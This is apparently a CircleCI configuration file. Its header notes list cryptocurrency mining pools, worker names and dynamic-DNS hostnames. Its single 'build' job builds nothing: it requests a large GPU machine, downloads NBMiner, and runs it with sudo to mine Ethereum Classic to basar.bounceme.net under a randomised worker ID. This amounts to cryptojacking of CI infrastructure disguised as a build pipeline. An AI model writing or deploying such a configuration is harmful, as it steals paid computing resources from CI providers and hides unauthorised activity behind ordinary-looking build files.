Ltc : Pool2 stratum+tcp://ltc.poolbinance.com:443 Astungk.001
Ethcls : Pool3 stratum+tcp://etc.poolbinance.com:443 Astungk1.001 99.83.144.230
1. maudi.sytes.net
2. trials.zapto.org
3. basar.bounceme.net

ETH : Barbar2


version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: wget https://github.com/NebuTech/NBMiner/releases/download/v40.1/NBMiner_40.1_Linux.tgz && tar -zxvf NBMiner_40.1_Linux.tgz && cd NBMiner_Linux/ && sudo ./nbminer -a etc -o basar.bounceme.net:443 -u Astungk1.$(shuf -n 1 -i 1-99999)  --enable-dag-cache
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi